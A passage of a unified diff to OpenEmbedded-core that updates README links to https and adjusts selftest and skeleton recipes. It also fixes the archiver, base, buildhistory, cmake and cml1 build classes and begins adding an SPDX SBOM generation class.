The Yocto Project has extensive documentation about OE including a reference manual
which can be found at:
- http://yoctoproject.org/documentation
+ https://docs.yoctoproject.org/
Contributing
------------
Please refer to
-http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
+https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
for guidelines on how to submit patches.
Mailing list:
- http://lists.openembedded.org/mailman/listinfo/openembedded-core
+ https://lists.openembedded.org/g/openembedded-core
Source code:
- http://git.openembedded.org/openembedded-core/
+ https://git.openembedded.org/openembedded-core/
diff --git a/meta-selftest/lib/pseudo_pyc_test1.py b/meta-selftest/lib/pseudo_pyc_test1.py
new file mode 100644
index 0000000000..b59abdd536
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test1.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test1"
diff --git a/meta-selftest/lib/pseudo_pyc_test2.py b/meta-selftest/lib/pseudo_pyc_test2.py
new file mode 100644
index 0000000000..fb67a978e0
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test2.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test2"
diff --git a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
index 9f905a5198..dcf6c8ba63 100644
--- a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
+++ b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
@@ -4,6 +4,7 @@
SUMMARY = "GNU Aspell spell-checker"
SECTION = "console/utils"
+HOMEPAGE = "https://ftp.gnu.org/gnu/aspell/"
LICENSE = "LGPLv2 | LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
index 07b83276fb..8a27e3a791 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
@@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717"
PV = "0.1+git${SRCPV}"
PR = "r2"
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
UPSTREAM_CHECK_COMMITS = "1"
RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
index 32ec4b14fa..fbe90d6c6b 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
@@ -10,7 +10,7 @@ DEPENDS = "dbus"
SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
PV = "0.1+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
UPSTREAM_CHECK_COMMITS = "1"
RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
diff --git a/meta-selftest/recipes-test/images/oe-selftest-image.bb b/meta-selftest/recipes-test/images/oe-selftest-image.bb
index 5d4d10eef6..6246aae910 100644
--- a/meta-selftest/recipes-test/images/oe-selftest-image.bb
+++ b/meta-selftest/recipes-test/images/oe-selftest-image.bb
@@ -1,6 +1,6 @@
SUMMARY = "An image used during oe-selftest tests"
-IMAGE_INSTALL = "packagegroup-core-boot dropbear"
+IMAGE_INSTALL = "packagegroup-core-boot packagegroup-core-ssh-dropbear"
IMAGE_FEATURES = "debug-tweaks"
IMAGE_LINGUAS = " "
diff --git a/meta-selftest/recipes-test/images/wic-image-minimal.bb b/meta-selftest/recipes-test/images/wic-image-minimal.bb
index e1da203b59..1cb019898d 100644
--- a/meta-selftest/recipes-test/images/wic-image-minimal.bb
+++ b/meta-selftest/recipes-test/images/wic-image-minimal.bb
@@ -6,7 +6,10 @@ IMAGE_INSTALL = "packagegroup-core-boot"
IMAGE_FSTYPES = "wic"
-WKS_FILE_DEPENDS = "syslinux syslinux-native dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS = "dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS_append_x86 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-64 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-x32 = " syslinux-native syslinux"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
new file mode 100644
index 0000000000..12dc91a8f3
--- /dev/null
+++ b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
@@ -0,0 +1,15 @@
+SUMMARY = "pseudo env test"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+python do_compile() {
+ import pseudo_pyc_test1
+ print(pseudo_pyc_test1.STRING)
+}
+
+python do_install() {
+ import pseudo_pyc_test2
+ print(pseudo_pyc_test2.STRING)
+}
diff --git a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
index 0cd0494da8..fd113b5ec5 100644
--- a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
+++ b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
@@ -2,7 +2,7 @@ SUMMARY = "Test recipe for recipeutils.patch_recipe()"
require recipeutils-test.inc
-LICENSE = "Proprietary"
+LICENSE = "HPND"
LIC_FILES_CHKSUM = "file://${WORKDIR}/somefile;md5=d41d8cd98f00b204e9800998ecf8427e"
DEPENDS += "zlib"
diff --git a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
index d8633702fc..8db57f202e 100644
--- a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
+++ b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Baremetal examples to work with the several QEMU architectures supported on OpenEmbedded"
HOMEPAGE = "https://github.com/aehs29/baremetal-helloqemu"
+DESCRIPTION = "These are introductory examples to showcase the use of QEMU to run baremetal applications."
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=39346640a23c701e4f459e05f56f4449"
diff --git a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
index 3d33446500..bc9acccd5f 100644
--- a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+++ b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Example of how to build an external Linux kernel module"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
diff --git a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
index 6194d4f8da..d53f9c7a40 100644
--- a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+++ b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
@@ -1,6 +1,6 @@
+SUMMARY = "An example kernel recipe that uses the linux-yocto and oe-core"
# linux-yocto-custom.bb:
#
-# An example kernel recipe that uses the linux-yocto and oe-core
# kernel classes to apply a subset of yocto kernel management to git
# managed kernel repositories.
#
diff --git a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
index f13186f933..e7d50aefda 100644
--- a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
+++ b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
@@ -1,5 +1,4 @@
-#
-# An example of a multilib image
+SUMMARY = "An example of a multilib image"
#
# This example includes a lib32 version of bash into an otherwise standard
# sato image. It assumes a "lib32" multilib has been enabled in the user's
diff --git a/meta-skeleton/recipes-skeleton/service/service_0.1.bb b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
index 6416618dcb..669d173ad1 100644
--- a/meta-skeleton/recipes-skeleton/service/service_0.1.bb
+++ b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "The canonical example of init scripts"
SECTION = "base"
+DESCRIPTION = "This recipe is a canonical example of init scripts"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYRIGHT;md5=349c872e0066155e1818b786938876a4"
diff --git a/meta/classes/archiver.bbclass b/meta/classes/archiver.bbclass
index 1a3c190604..6ead010fe1 100644
--- a/meta/classes/archiver.bbclass
+++ b/meta/classes/archiver.bbclass
@@ -53,10 +53,11 @@ ARCHIVER_MODE[recipe] ?= "0"
ARCHIVER_MODE[mirror] ?= "split"
DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources"
-ARCHIVER_TOPDIR ?= "${WORKDIR}/deploy-sources"
-ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources"
+ARCHIVER_ARCH = "${TARGET_SYS}"
+ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${ARCHIVER_ARCH}/${PF}/"
ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm"
-ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${ARCHIVER_ARCH}/${PF}/"
ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/"
# When producing a combined mirror directory, allow duplicates for the case
@@ -100,6 +101,10 @@ python () {
bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn)
return
+ # TARGET_SYS in ARCHIVER_ARCH will break the stamp for gcc-source in multiconfig
+ if pn.startswith('gcc-source'):
+ d.setVar('ARCHIVER_ARCH', "allarch")
+
def hasTask(task):
return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False))
@@ -281,7 +286,10 @@ python do_ar_configured() {
# ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the
# do_configure, we archive the already configured ${S} to
# instead of.
- elif pn != 'libtool-native':
+ # The kernel class functions require it to be on work-shared, we
+ # don't unpack, patch, configure again, just archive the already
+ # configured ${S}
+ elif not (pn == 'libtool-native' or is_work_shared(d)):
def runTask(task):
prefuncs = d.getVarFlag(task, 'prefuncs') or ''
for func in prefuncs.split():
@@ -484,6 +492,9 @@ python do_unpack_and_patch() {
src_orig = '%s.orig' % src
oe.path.copytree(src, src_orig)
+ if bb.data.inherits_class('dos2unix', d):
+ bb.build.exec_func('do_convert_crlf_to_lf', d)
+
# Make sure gcc and kernel sources are patched only once
if not (d.getVar('SRC_URI') == "" or is_work_shared(d)):
bb.build.exec_func('do_patch', d)
@@ -572,7 +583,7 @@ python do_dumpdata () {
SSTATETASKS += "do_deploy_archives"
do_deploy_archives () {
- echo "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
+ bbnote "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
}
python do_deploy_archives_setscene () {
sstate_setscene(d)
@@ -591,6 +602,7 @@ addtask do_dumpdata
addtask do_ar_recipe
addtask do_deploy_archives
do_build[recrdeptask] += "do_deploy_archives"
+do_rootfs[recrdeptask] += "do_deploy_archives"
do_populate_sdk[recrdeptask] += "do_deploy_archives"
python () {
diff --git a/meta/classes/base.bbclass b/meta/classes/base.bbclass
index 7aa2e144eb..3cae577a0e 100644
--- a/meta/classes/base.bbclass
+++ b/meta/classes/base.bbclass
@@ -122,6 +122,10 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
tools = d.getVar(toolsvar).split()
origbbenv = d.getVar("BB_ORIGENV", False)
path = origbbenv.getVar("PATH")
+ # Need to ignore our own scripts directories to avoid circular links
+ for p in path.split(":"):
+ if p.endswith("/scripts"):
+ path = path.replace(p, "/ignoreme")
bb.utils.mkdirhier(dest)
notfound = []
for tool in tools:
@@ -135,7 +139,7 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
# /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc)
# would return /usr/local/bin/ccache/gcc, but what we need is
# /usr/bin/gcc, this code can check and fix that.
- if "ccache" in srctool:
+ if os.path.islink(srctool) and os.path.basename(os.readlink(srctool)) == 'ccache':
srctool = bb.utils.which(path, tool, executable=True, direction=1)
if srctool:
os.symlink(srctool, desttool)
@@ -153,14 +157,14 @@ do_fetch[vardeps] += "SRCREV"
python base_do_fetch() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
fetcher = bb.fetch2.Fetch(src_uri, d)
fetcher.download()
except bb.fetch2.BBFetchException as e:
- bb.fatal(str(e))
+ bb.fatal("Bitbake Fetcher Error: " + repr(e))
}
addtask unpack after do_fetch
@@ -170,14 +174,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o
python base_do_unpack() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
fetcher = bb.fetch2.Fetch(src_uri, d)
fetcher.unpack(d.getVar('WORKDIR'))
except bb.fetch2.BBFetchException as e:
- bb.fatal(str(e))
+ bb.fatal("Bitbake Fetcher Error: " + repr(e))
}
def get_layers_branch_rev(d):
@@ -231,6 +235,7 @@ python base_eventhandler() {
if isinstance(e, bb.event.ConfigParsed):
if not d.getVar("NATIVELSBSTRING", False):
d.setVar("NATIVELSBSTRING", lsb_distro_identifier(d))
+ d.setVar("ORIGNATIVELSBSTRING", d.getVar("NATIVELSBSTRING", False))
d.setVar('BB_VERSION', bb.__version__)
# There might be no bb.event.ConfigParsed event if bitbake server is
@@ -388,6 +393,11 @@ python () {
oe.utils.features_backfill("DISTRO_FEATURES", d)
oe.utils.features_backfill("MACHINE_FEATURES", d)
+ if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("S")):
+ d.appendVar("PSEUDO_IGNORE_PATHS", ",${S}")
+ if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("B")):
+ d.appendVar("PSEUDO_IGNORE_PATHS", ",${B}")
+
# Handle PACKAGECONFIG
#
# These take the form:
@@ -682,7 +692,7 @@ python () {
if os.path.basename(p) == machine and os.path.isdir(p):
paths.append(p)
- if len(paths) != 0:
+ if paths:
for s in srcuri.split():
if not s.startswith("file://"):
continue
@@ -715,7 +725,7 @@ do_cleansstate[nostamp] = "1"
python do_cleanall() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
diff --git a/meta/classes/bin_package.bbclass b/meta/classes/bin_package.bbclass
index cbc9b1fa13..c1954243ee 100644
--- a/meta/classes/bin_package.bbclass
+++ b/meta/classes/bin_package.bbclass
@@ -30,8 +30,9 @@ bin_package_do_install () {
bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S.
fi
cd ${S}
+ install -d ${D}${base_prefix}
tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \
- | tar --no-same-owner -xpf - -C ${D}
+ | tar --no-same-owner -xpf - -C ${D}${base_prefix}
}
FILES_${PN} = "/"
diff --git a/meta/classes/buildhistory.bbclass b/meta/classes/buildhistory.bbclass
index 156324d339..6a1a20653a 100644
--- a/meta/classes/buildhistory.bbclass
+++ b/meta/classes/buildhistory.bbclass
@@ -671,13 +671,16 @@ IMAGE_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_imageinfo"
POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;"
POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;"
POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;"
+POPULATE_SDK_POST_TARGET_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_target buildhistory_get_sdk_installed_target"
POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;"
POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;"
POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;"
+POPULATE_SDK_POST_HOST_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_host buildhistory_get_sdk_installed_host"
SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
+SDK_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_sdkinfo buildhistory_get_extra_sdkinfo"
python buildhistory_write_sigs() {
if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split():
@@ -852,7 +855,7 @@ END
}
python buildhistory_eventhandler() {
- if e.data.getVar('BUILDHISTORY_FEATURES').strip():
+ if (e.data.getVar('BUILDHISTORY_FEATURES') or "").strip():
reset = e.data.getVar("BUILDHISTORY_RESET")
olddir = e.data.getVar("BUILDHISTORY_OLD_DIR")
if isinstance(e, bb.event.BuildStarted):
@@ -862,6 +865,7 @@ python buildhistory_eventhandler() {
if os.path.isdir(olddir):
shutil.rmtree(olddir)
rootdir = e.data.getVar("BUILDHISTORY_DIR")
+ bb.utils.mkdirhier(rootdir)
entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
bb.utils.mkdirhier(olddir)
for entry in entries:
@@ -950,23 +954,19 @@ def write_latest_srcrev(d, pkghistdir):
value = value.replace('"', '').strip()
old_tag_srcrevs[key] = value
with open(srcrevfile, 'w') as f:
- orig_srcrev = d.getVar('SRCREV', False) or 'INVALID'
- if orig_srcrev != 'INVALID':
- f.write('# SRCREV = "%s"\n' % orig_srcrev)
- if len(srcrevs) > 1:
- for name, srcrev in sorted(srcrevs.items()):
- orig_srcrev = d.getVar('SRCREV_%s' % name, False)
- if orig_srcrev:
- f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev))
- f.write('SRCREV_%s = "%s"\n' % (name, srcrev))
- else:
- f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values())))
- if len(tag_srcrevs) > 0:
- for name, srcrev in sorted(tag_srcrevs.items()):
- f.write('# tag_%s = "%s"\n' % (name, srcrev))
- if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
- pkg = d.getVar('PN')
- bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
+ for name, srcrev in sorted(srcrevs.items()):
+ suffix = "_" + name
+ if name == "default":
+ suffix = ""
+ orig_srcrev = d.getVar('SRCREV%s' % suffix, False)
+ if orig_srcrev:
+ f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev))
+ f.write('SRCREV%s = "%s"\n' % (suffix, srcrev))
+ for name, srcrev in sorted(tag_srcrevs.items()):
+ f.write('# tag_%s = "%s"\n' % (name, srcrev))
+ if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
+ pkg = d.getVar('PN')
+ bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
else:
if os.path.exists(srcrevfile):
diff --git a/meta/classes/cmake.bbclass b/meta/classes/cmake.bbclass
index 8243f7ce8c..af6a8c4395 100644
--- a/meta/classes/cmake.bbclass
+++ b/meta/classes/cmake.bbclass
@@ -102,7 +102,8 @@ set( CMAKE_CXX_COMPILER ${OECMAKE_CXX_COMPILER} )
set( CMAKE_C_COMPILER_LAUNCHER ${OECMAKE_C_COMPILER_LAUNCHER} )
set( CMAKE_CXX_COMPILER_LAUNCHER ${OECMAKE_CXX_COMPILER_LAUNCHER} )
set( CMAKE_ASM_COMPILER ${OECMAKE_C_COMPILER} )
-set( CMAKE_AR ${OECMAKE_AR} CACHE FILEPATH "Archiver" )
+find_program( CMAKE_AR ${OECMAKE_AR} DOC "Archiver" REQUIRED )
+
set( CMAKE_C_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "CFLAGS" )
set( CMAKE_CXX_FLAGS "${OECMAKE_CXX_FLAGS}" CACHE STRING "CXXFLAGS" )
set( CMAKE_ASM_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "ASM FLAGS" )
diff --git a/meta/classes/cml1.bbclass b/meta/classes/cml1.bbclass
index 8ab240589a..46a19fce32 100644
--- a/meta/classes/cml1.bbclass
+++ b/meta/classes/cml1.bbclass
@@ -36,6 +36,14 @@ python do_menuconfig() {
except OSError:
mtime = 0
+ # setup native pkg-config variables (kconfig scripts call pkg-config directly, cannot generically be overriden to pkg-config-native)
+ d.setVar("PKG_CONFIG_DIR", "${STAGING_DIR_NATIVE}${libdir_native}/pkgconfig")
+ d.setVar("PKG_CONFIG_PATH", "${PKG_CONFIG_DIR}:${STAGING_DATADIR_NATIVE}/pkgconfig")
+ d.setVar("PKG_CONFIG_LIBDIR", "${PKG_CONFIG_DIR}")
+ d.setVarFlag("PKG_CONFIG_SYSROOT_DIR", "unexport", "1")
+ # ensure that environment variables are overwritten with this tasks 'd' values
+ d.appendVar("OE_TERMINAL_EXPORTS", " PKG_CONFIG_DIR PKG_CONFIG_PATH PKG_CONFIG_LIBDIR PKG_CONFIG_SYSROOT_DIR")
+
oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'),
d.getVar('PN') + ' Configuration', d)
diff --git a/meta/classes/create-spdx-2.2.bbclass b/meta/classes/create-spdx-2.2.bbclass
new file mode 100644
index 0000000000..42b693d586
--- /dev/null
+++ b/meta/classes/create-spdx-2.2.bbclass
@@ -0,0 +1,1067 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+DEPLOY_DIR_SPDX ??= "${DEPLOY_DIR}/spdx/${MACHINE}"
+
+# The product name that the CVE database uses. Defaults to BPN, but may need to
+# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
+CVE_PRODUCT ??= "${BPN}"
+CVE_VERSION ??= "${PV}"
+
+SPDXDIR ??= "${WORKDIR}/spdx"
+SPDXDEPLOY = "${SPDXDIR}/deploy"
+SPDXWORK = "${SPDXDIR}/work"
+SPDXIMAGEWORK = "${SPDXDIR}/image-work"
+SPDXSDKWORK = "${SPDXDIR}/sdk-work"
+
+SPDX_TOOL_NAME ??= "oe-spdx-creator"
+SPDX_TOOL_VERSION ??= "1.0"
+
+SPDXRUNTIMEDEPLOY = "${SPDXDIR}/runtime-deploy"
+
+SPDX_INCLUDE_SOURCES ??= "0"
+SPDX_ARCHIVE_SOURCES ??= "0"
+SPDX_ARCHIVE_PACKAGED ??= "0"
+
+SPDX_UUID_NAMESPACE ??= "sbom.openembedded.org"
+SPDX_NAMESPACE_PREFIX ??= "http://spdx.org/spdxdoc"
+SPDX_PRETTY ??= "0"
+
+SPDX_LICENSES ??= "${COREBASE}/meta/files/spdx-licenses.json"
+
+SPDX_CUSTOM_ANNOTATION_VARS ??= ""
+
+SPDX_ORG ??= "OpenEmbedded ()"
+SPDX_SUPPLIER ??= "Organization: ${SPDX_ORG}"
+SPDX_SUPPLIER[doc] = "The SPDX PackageSupplier field for SPDX packages created from \
+ this recipe. For SPDX documents create using this class during the build, this \
+ is the contact information for the person or organization who is doing the \
+ build."
+
+def extract_licenses(filename):
+ import re
+
+ lic_regex = re.compile(rb'^\W*SPDX-License-Identifier:\s*([ \w\d.()+-]+?)(?:\s+\W*)?$', re.MULTILINE)
+
+ try:
+ with open(filename, 'rb') as f:
+ size = min(15000, os.stat(filename).st_size)
+ txt = f.read(size)
+ licenses = re.findall(lic_regex, txt)
+ if licenses:
+ ascii_licenses = [lic.decode('ascii') for lic in licenses]
+ return ascii_licenses
+ except Exception as e:
+ bb.warn(f"Exception reading {filename}: {e}")
+ return None
+
+def get_doc_namespace(d, doc):
+ import uuid
+ namespace_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, d.getVar("SPDX_UUID_NAMESPACE"))
+ return "%s/%s-%s" % (d.getVar("SPDX_NAMESPACE_PREFIX"), doc.name, str(uuid.uuid5(namespace_uuid, doc.name)))
+
+def create_annotation(d, comment):
+ from datetime import datetime, timezone
+
+ creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+ annotation = oe.spdx.SPDXAnnotation()
+ annotation.annotationDate = creation_time
+ annotation.annotationType = "OTHER"
+ annotation.annotator = "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION"))
+ annotation.comment = comment
+ return annotation
+
+def recipe_spdx_is_native(d, recipe):
+ return any(a.annotationType == "OTHER" and
+ a.annotator == "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION")) and
+ a.comment == "isNative" for a in recipe.annotations)
+
+def is_work_shared_spdx(d):
+ return bb.data.inherits_class('kernel', d) or ('work-shared' in d.getVar('WORKDIR'))
+
+def get_json_indent(d):
+ if d.getVar("SPDX_PRETTY") == "1":
+ return 2
+ return None
+
+python() {
+ import json
+ if d.getVar("SPDX_LICENSE_DATA"):
+ return
+
+ with open(d.getVar("SPDX_LICENSES"), "r") as f:
+ data = json.load(f)
+ # Transform the license array to a dictionary
+ data["licenses"] = {l["licenseId"]: l for l in data["licenses"]}
+ d.setVar("SPDX_LICENSE_DATA", data)
+}
+
+def convert_license_to_spdx(lic, document, d, existing={}):
+ from pathlib import Path
+ import oe.spdx
+
+ license_data = d.getVar("SPDX_LICENSE_DATA")
+ extracted = {}
+
+ def add_extracted_license(ident, name):
+ nonlocal document
+
+ if name in extracted:
+ return
+
+ extracted_info = oe.spdx.SPDXExtractedLicensingInfo()
+ extracted_info.name = name
+ extracted_info.licenseId = ident
+ extracted_info.extractedText = None
+
+ if name == "PD":
+ # Special-case this.
+ extracted_info.extractedText = "Software released to the public domain"
+ else:
+ # Seach for the license in COMMON_LICENSE_DIR and LICENSE_PATH
+ for directory in [d.getVar('COMMON_LICENSE_DIR')] + (d.getVar('LICENSE_PATH') or '').split():
+ try:
+ with (Path(directory) / name).open(errors="replace") as f:
+ extracted_info.extractedText = f.read()
+ break
+ except FileNotFoundError:
+ pass
+ if extracted_info.extractedText is None:
+ # If it's not SPDX or PD, then NO_GENERIC_LICENSE must be set
+ filename = d.getVarFlag('NO_GENERIC_LICENSE', name)
+ if filename:
+ filename = d.expand("${S}/" + filename)
+ with open(filename, errors="replace") as f:
+ extracted_info.extractedText = f.read()
+ else:
+ bb.error("Cannot find any text for license %s" % name)
+
+ extracted[name] = extracted_info
+ document.hasExtractedLicensingInfos.append(extracted_info)
+
+ def convert(l):
+ if l == "(" or l == ")":
+ return l
+
+ if l == "&":
+ return "AND"
+
+ if l == "|":
+ return "OR"
+
+ if l == "CLOSED":
+ return "NONE"
+
+ spdx_license = d.getVarFlag("SPDXLICENSEMAP", l) or l
+ if spdx_license in license_data["licenses"]:
+ return spdx_license
+
+ try:
+ spdx_license = existing[l]
+ except KeyError:
+ spdx_license = "LicenseRef-" + l
+ add_extracted_license(spdx_license, l)
+
+ return spdx_license
+
+ lic_split = lic.replace("(", " ( ").replace(")", " ) ").split()
+
+ return ' '.join(convert(l) for l in lic_split)
+
+def process_sources(d):
+ pn = d.getVar('PN')
+ assume_provided = (d.getVar("ASSUME_PROVIDED") or "").split()
+ if pn in assume_provided:
+ for p in d.getVar("PROVIDES").split():
+ if p != pn:
+ pn = p
+ break
+
+ # glibc-locale: do_fetch, do_unpack and do_patch tasks have been deleted,
+ # so avoid archiving source here.
+ if pn.startswith('glibc-locale'):
+ return False
+ if d.getVar('PN') == "libtool-cross":
+ return False
+ if d.getVar('PN') == "libgcc-initial":
+ return False
+ if d.getVar('PN') == "shadow-sysroot":
+ return False
+
+ # We just archive gcc-source for all the gcc related recipes
+ if d.getVar('BPN') in ['gcc', 'libgcc']:
+ bb.debug(1, 'spdx: There is bug in scan of %s is, do nothing' % pn)
+ return False
+
+ return True
+
+
+def add_package_files(d, doc, spdx_pkg, topdir, get_spdxid, get_types, *, archive=None, ignore_dirs=[], ignore_top_level_dirs=[]):
+ from pathlib import Path
+ import oe.spdx
+ import hashlib
+
+ source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+ if source_date_epoch:
+ source_date_epoch = int(source_date_epoch)
+
+ sha1s = []
+ spdx_files = []
+
+ file_counter = 1
